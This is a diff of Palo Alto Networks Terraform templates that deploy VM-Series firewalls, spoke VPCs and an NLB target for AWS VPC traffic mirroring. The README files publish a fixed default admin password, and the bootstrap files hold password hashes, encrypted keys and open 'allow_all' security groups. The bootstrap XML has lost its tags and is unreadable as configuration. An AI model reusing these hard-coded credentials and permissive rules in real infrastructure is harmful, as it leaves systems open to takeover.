"${aws_subnet.vpc_mirror_priv_2.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_priv_2}" + + untrust_subnet_id = "${aws_subnet.vpc_mirror_pub_2.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_pub_2}" + + management_subnet_id = "${aws_subnet.vpc_mirror_pub_2.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile4.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket4}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} +####################### +output "FW-1-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw1.eip_mgmt}" +} +output "FW-3-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw3.eip_mgmt}" +} +output "FW-4-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw4.eip_mgmt}" +} +output "Server-1-1_ngfw1_access" { + value = "Access Server 1-1 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 1001" +} + +output "Server-1-2_ngfw1_access" { + value = "Access Server 1-2 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 1002" +} + +output "Server-2-1_ngfw1_access" { + value = "Access Server 2-1 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 2001" +} + +output "Server-2-2_ngfw1_access" { + value = "Access Server 2-2 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 2002" +} + +output "FW-2-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw2.eip_mgmt}" +} + +output "Server-1-1_ngfw2_access" { + value = "Access Server 1-1 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 1001" +} + +output "Server-1-2_ngfw2_access" { + value = "Access Server 1-2 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 1002" +} + +output "Server-2-1_ngfw2_access" { + value = "Access Server 2-1 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 2001" +} + +output "Server-2-2_ngfw2_access" { + value = "Access Server 2-2 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 2002" +} diff --git a/aws/TGW-VPC-Mirroring/vpc_spoke/main.tf b/aws/TGW-VPC-Mirroring/vpc_spoke/main.tf new file mode 100644 index 00000000..5d3673ed --- /dev/null +++ b/aws/TGW-VPC-Mirroring/vpc_spoke/main.tf @@ -0,0 +1,191 @@ +variable vpc_spoke_cidr { + description = "CIDR Network Address for Spoke VPC" +} + +variable vpc_spoke_subnet_cidr { + description = "CIDR Network Address for Spoke Subnet" +} + +variable vpc_spoke_subnet2_cidr { + description = "CIDR Network Address for Spoke Subnet" +} + +variable aws_tgw_id { + description = "AWS Transit Gateway ID" +} + +variable aws_tgw_security_rtb_id { + description = "AWS Transit Gateway Route Table Id" +} + +variable aws_tgw_spoke_rtb_id { + description = "AWS Transit Gateway Route Table Id" +} + +variable pemkey { + description = "AWS pem KEY" +} + +variable serverip { + description = "Ubuntu Server IP" +} + +variable server2ip { + description = "Ubuntu Server2 IP" +} + +variable servername { + description = "Ubuntu Server name" +} + +variable server2name { + description = "Ubuntu Server2 name" +} + +resource "aws_vpc" "vpc_spoke" { + cidr_block = "${var.vpc_spoke_cidr}" + + tags { + Name = "vpc_spoke_${var.vpc_spoke_cidr}" + } +} + +data "aws_availability_zones" "available" {} + +resource "aws_subnet" "primary" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + cidr_block = "${var.vpc_spoke_subnet_cidr}" + availability_zone = 
"${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_spokeA_${var.vpc_spoke_subnet_cidr}" + } +} + +resource "aws_subnet" "secondary" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + cidr_block = "${var.vpc_spoke_subnet2_cidr}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_spokeB_${var.vpc_spoke_subnet2_cidr}" + } +} + +resource "aws_security_group" "server_sg" { + name = "server_sg" + description = "Allow select inbound traffic" + vpc_id = "${aws_vpc.vpc_spoke.id}" +} + +resource "aws_security_group_rule" "allow_server_sg_ingress" { + type = "ingress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["10.0.0.0/8", "192.168.0.0/16"] + + security_group_id = "${aws_security_group.server_sg.id}" +} + +resource "aws_security_group_rule" "allow_server_sg_egress" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.server_sg.id}" +} + +resource "aws_route" "vpc_spoke_route_1" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_route" "vpc_spoke_route_2" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "192.168.0.0/16" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_route" "vpc_spoke_route_3" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "0.0.0.0/0" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_spoke_attachment" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + subnet_ids = ["${aws_subnet.primary.id}", "${aws_subnet.secondary.id}"] + transit_gateway_id = "${var.aws_tgw_id}" + transit_gateway_default_route_table_association = false + transit_gateway_default_route_table_propagation = false + + tags { + Name = "tgw_attachment_spoke_${var.vpc_spoke_cidr}" + } +} + +resource "aws_ec2_transit_gateway_route_table_association" "vpc_spoke_1" { + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}" + transit_gateway_route_table_id = "${var.aws_tgw_spoke_rtb_id}" +} + +resource "aws_ec2_transit_gateway_route_table_propagation" "route_table_propagation" { + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}" + transit_gateway_route_table_id = "${var.aws_tgw_security_rtb_id}" +} + +//Server in subnet +data "aws_ami" "ubuntu" { + most_recent = true + + filter { + name = "name" + values = ["ubuntu/images/hvm-ssd/ubuntu-trusty-14.04-amd64-server-*"] + } + + filter { + name = "virtualization-type" + values = ["hvm"] + } + + owners = ["099720109477"] # Canonical +} + +resource "aws_instance" "web" { + ami = "${data.aws_ami.ubuntu.id}" + instance_type = "t3a.micro" + key_name = "${var.pemkey}" + subnet_id = "${aws_subnet.primary.id}" + private_ip = "${var.serverip}" + security_groups = ["${aws_security_group.server_sg.id}"] + + tags = { + Name = "${var.servername}" + } +} + +resource "aws_instance" "web2" { + ami = "${data.aws_ami.ubuntu.id}" + instance_type = "t3a.micro" + key_name = "${var.pemkey}" + subnet_id = "${aws_subnet.secondary.id}" + private_ip = "${var.server2ip}" + security_groups = ["${aws_security_group.server_sg.id}"] + + tags = { + Name = "${var.server2name}" + } +} + +//End Server +output "vpc_id" { + value = "${aws_vpc.vpc_spoke.id}" +} + +output "subnet_id" { + 
value = "${aws_subnet.primary.id}" +} diff --git a/aws/TGW-VPC-Mirroring/vpc_spokes.tf b/aws/TGW-VPC-Mirroring/vpc_spokes.tf new file mode 100644 index 00000000..d0e66637 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/vpc_spokes.tf @@ -0,0 +1,31 @@ +module "spoke1" { + source = "./vpc_spoke/" + + pemkey = "${var.aws_key}" + serverip = "${var.spoke1_server}" + server2ip = "${var.spoke1_server2}" + servername = "spoke1-server1" + server2name = "spoke1-server2" + vpc_spoke_cidr = "${var.spoke1_cidr}" + vpc_spoke_subnet_cidr = "${var.spoke1_subnet}" + vpc_spoke_subnet2_cidr = "${var.spoke1_subnet2}" + aws_tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + aws_tgw_spoke_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" + aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} + +module "spoke2" { + source = "./vpc_spoke/" + + pemkey = "${var.aws_key}" + serverip = "${var.spoke2_server}" + server2ip = "${var.spoke2_server2}" + servername = "spoke2-server" + server2name = "spoke2-server2" + vpc_spoke_cidr = "${var.spoke2_cidr}" + vpc_spoke_subnet_cidr = "${var.spoke2_subnet}" + vpc_spoke_subnet2_cidr = "${var.spoke2_subnet2}" + aws_tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + aws_tgw_spoke_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" + aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} diff --git a/aws/TGW-VPC/README.md b/aws/TGW-VPC/README.md index 985234d8..a0abade7 100644 --- a/aws/TGW-VPC/README.md +++ b/aws/TGW-VPC/README.md @@ -20,7 +20,7 @@ 3. Here is a link to setting up a creds file to access AWS: https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html 4. After deployment the firewall username and password are: - Username: paloalto + Username: admin Password: Pal0Alt0@123 ``` diff --git a/aws/TGW-VPC/vm-series/main.tf b/aws/TGW-VPC/vm-series/main.tf index 30f8cb7b..e519e14c 100644 --- a/aws/TGW-VPC/vm-series/main.tf +++ b/aws/TGW-VPC/vm-series/main.tf @@ -48,8 +48,7 @@ variable "license_type_map" { data "aws_ami" "panw_ngfw" { most_recent = true - include owners = [“aws-marketplace”] - + owners = ["aws-marketplace"] filter { name = "owner-alias" values = ["aws-marketplace"] diff --git a/aws/VPC_Mirror_Target/README.md b/aws/VPC_Mirror_Target/README.md new file mode 100644 index 00000000..69b1c1f2 --- /dev/null +++ b/aws/VPC_Mirror_Target/README.md @@ -0,0 +1,69 @@ +## 2 x VM-Series / NLB for VPC Mirror +Terraform creates 2 VM-Series firewalls that are targets of an internal load balancer ready to receive VXLAN traffic from a VPC Mirroring configuration. After deployment there are some steps that need to be done to setup VPC traffic Mirroring. Those are documenented in screen shots below. + +### Overview +* 1 x VPC +* 2 x VM-Series (Bundle2) +* 1 x NLB Internal Load Balancer listening on VXLAN UDP Port 4789 (NGFW 3 & 4 as targets) +* 2 x S3 Buckets for VM-Series + +This is picture of the deployed environment: + + +![deployment](https://user-images.githubusercontent.com/21991161/65703297-271e2700-e04a-11e9-9827-5512629c6db0.jpg) + + +### Prerequistes +1. Terraform +2. Access to AWS Console + +After deployment, the firewalls' username and password are: + * **Username:** admin + * **Password:** Pal0Alt0@123 + +### Deployment +1. Download the **TGW-VPC-Mirroring** repo to the machine running the build +2. 
In an editor, open **variables.tf** and set values for the following variables: + +| Variable | Description | +| :------------- | :------------- | +| `aws_region` | AWS Region of Deployment | +| `aws_key` | Authentication key file for deployed VMs | +| `bootstrap_s3bucket3` | Universally unique name for Bootstrap S3 Bucket for NGFW3 | +| `bootstrap_s3bucket4` | Universally unique name for Bootstrap S3 Bucket for NGFW4 | + +3. Execute Terraform +``` +$ terraform init +$ terraform plan +$ terraform apply +``` + +4. After deployment, an output with connection information will be displayed: +![Output](https://user-images.githubusercontent.com/21991161/65703240-12419380-e04a-11e9-9dc4-4a89231fc857.jpg) + +5. To configure VPC Traffic Mirroring, first select VPC/Traffic Mirroring/Mirror Filters and create a new traffic mirror filter + +![Mirrorfilterselection](https://user-images.githubusercontent.com/21991161/65637508-eb338500-dfa9-11e9-893b-1255ed2f7135.jpg) + + +6. Fill in the fields and click Create +![MirrorFilterOptions](https://user-images.githubusercontent.com/21991161/65637506-eb338500-dfa9-11e9-9453-c9a32bf9f276.jpg) + +7. Next, select VPC/Traffic Mirroring/Mirror Targets and click Create a Mirror Target +![Mirrortargetselection](https://user-images.githubusercontent.com/21991161/65637512-ebcc1b80-dfa9-11e9-9d27-a50ac1698ad3.jpg) + + +8. Fill in the fields and click Create +![MirrorTargetoptions](https://user-images.githubusercontent.com/21991161/65637511-eb338500-dfa9-11e9-82b4-65cedbdeea71.jpg) + +9. Select VPC/Traffic Mirroring/Mirror Sessions and click Create a Mirror Session +![MirrorSessionSelection](https://user-images.githubusercontent.com/21991161/65637510-eb338500-dfa9-11e9-9966-b4f5d1b279ca.jpg) + +10. Fill in the fields and click Create +![mirrorsessionoptions](https://user-images.githubusercontent.com/21991161/65637509-eb338500-dfa9-11e9-87c9-fdfdb3a6a738.jpg) + +## Support Policy +The guide in this directory and accompanying files are released under an as-is, best-effort support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used by the scripts or templates (the VM-Series firewall) is still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. 
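As an alternative to the console steps in the Deployment section above, the mirror filter, target, and session can also be declared in Terraform with a provider version recent enough to include the EC2 Traffic Mirroring resources. The sketch below is illustrative only: it reuses the internal NLB defined in `nlb.tf` (`aws_lb.mirror-lb`) as the mirror target, while the resource labels and the source ENI ID (`eni-0123456789abcdef0`) are placeholders to replace with the ENI of the workload whose traffic should be mirrored.

```
# Filter that accepts all traffic, in both directions, for mirroring
resource "aws_ec2_traffic_mirror_filter" "mirror_all" {
  description = "Mirror all traffic to the VM-Series NLB target"
}

resource "aws_ec2_traffic_mirror_filter_rule" "ingress_all" {
  traffic_mirror_filter_id = "${aws_ec2_traffic_mirror_filter.mirror_all.id}"
  traffic_direction        = "ingress"
  rule_number              = 10
  rule_action              = "accept"
  source_cidr_block        = "0.0.0.0/0"
  destination_cidr_block   = "0.0.0.0/0"
}

resource "aws_ec2_traffic_mirror_filter_rule" "egress_all" {
  traffic_mirror_filter_id = "${aws_ec2_traffic_mirror_filter.mirror_all.id}"
  traffic_direction        = "egress"
  rule_number              = 10
  rule_action              = "accept"
  source_cidr_block        = "0.0.0.0/0"
  destination_cidr_block   = "0.0.0.0/0"
}

# The internal NLB from nlb.tf becomes the mirror target
resource "aws_ec2_traffic_mirror_target" "nlb_target" {
  description               = "VM-Series VXLAN target behind mirror-lb"
  network_load_balancer_arn = "${aws_lb.mirror-lb.arn}"
}

# Mirror a source ENI (placeholder ID) to the target through the filter
resource "aws_ec2_traffic_mirror_session" "workload" {
  description              = "Mirror workload traffic to the VM-Series"
  network_interface_id     = "eni-0123456789abcdef0"
  traffic_mirror_filter_id = "${aws_ec2_traffic_mirror_filter.mirror_all.id}"
  traffic_mirror_target_id = "${aws_ec2_traffic_mirror_target.nlb_target.id}"
  session_number           = 1
}
```

The mirrored packets arrive as VXLAN on UDP 4789, which is the listener port already configured on `mirror-lb`, so no additional listener changes should be needed.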
diff --git a/aws/VPC_Mirror_Target/bootstrap3.tf b/aws/VPC_Mirror_Target/bootstrap3.tf new file mode 100644 index 00000000..b8ae9407 --- /dev/null +++ b/aws/VPC_Mirror_Target/bootstrap3.tf @@ -0,0 +1,97 @@ +# Create a BootStrap S3 Bucket + +resource "aws_s3_bucket" "bootstrap_bucket3" { + bucket = "${var.bootstrap_s3bucket3}" + acl = "private" + force_destroy = true + + tags { + Name = "bootstrap_bucket3" + } +} + +# Create Folders and Upload Bootstrap Files +resource "aws_s3_bucket_object" "bootstrap_xml3" { + bucket = "${aws_s3_bucket.bootstrap_bucket3.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files3/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt3" { + bucket = "${aws_s3_bucket.bootstrap_bucket3.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files3/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software3" { + bucket = "${aws_s3_bucket.bootstrap_bucket3.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license3" { + bucket = "${aws_s3_bucket.bootstrap_bucket3.id}" + acl = "private" + key = "license/authcodes" + source = "bootstrap_files3/authcodes" +} + +resource "aws_s3_bucket_object" "content3" { + bucket = "${aws_s3_bucket.bootstrap_bucket3.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + +/* Roles, ACLs, Permissions, etc... */ + +resource "aws_iam_role" "bootstrap_role3" { + name = "ngfw_bootstrap_role3" + + assume_role_policy = < + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. 
+ + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + LB Healthcheck + + + + + + + + no + + + + + no + + + no + + + no + + + down + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + 18.224.86.63 + 8.8.8.8 + 382932559738703 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + mirror + + + mirror + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + + no + + + + vxlan + + + any + + + any + + + any + + + any + + + any + + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any 
+ disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + + diff --git a/aws/VPC_Mirror_Target/bootstrap_files3/init-cfg.txt b/aws/VPC_Mirror_Target/bootstrap_files3/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null +++ b/aws/VPC_Mirror_Target/bootstrap_files3/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/VPC_Mirror_Target/bootstrap_files4/authcodes b/aws/VPC_Mirror_Target/bootstrap_files4/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/aws/VPC_Mirror_Target/bootstrap_files4/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/aws/VPC_Mirror_Target/bootstrap_files4/bootstrap.xml b/aws/VPC_Mirror_Target/bootstrap_files4/bootstrap.xml new file mode 100644 index 00000000..47244dd3 --- /dev/null +++ b/aws/VPC_Mirror_Target/bootstrap_files4/bootstrap.xml @@ -0,0 +1,1018 @@ + + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. 
+ + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + LB HealthCheck + + up + + + + + + + no + + + + + no + + + no + + + no + + + down + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + 18.224.86.63 + 8.8.8.8 + 382932559738703 + mgmt-interface-swap + + + + + + + + + + + + + + + + + + + + + + + ethernet1/1 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + mirror + + + mirror + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + ethernet1/1 + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + 
allow + no + yes + + + deny + no + yes + + + + + + + + + no + + + + vxlan + + + any + + + any + + + any + + + any + + + any + + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any + disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + + diff --git a/aws/VPC_Mirror_Target/bootstrap_files4/init-cfg.txt b/aws/VPC_Mirror_Target/bootstrap_files4/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null 